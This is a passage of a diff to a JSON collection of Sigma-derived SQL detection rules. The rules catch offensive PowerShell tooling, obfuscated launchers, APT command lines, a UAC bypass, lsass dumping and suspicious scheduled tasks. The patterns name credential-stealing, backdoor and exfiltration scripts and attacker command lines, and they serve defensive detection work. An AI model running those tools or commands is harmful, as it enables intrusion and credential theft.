'%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo 
minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": 
"posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% 
/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR 
CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, 
oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP 
'(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' 
OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP 
'\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" 
+ "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo 
LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE 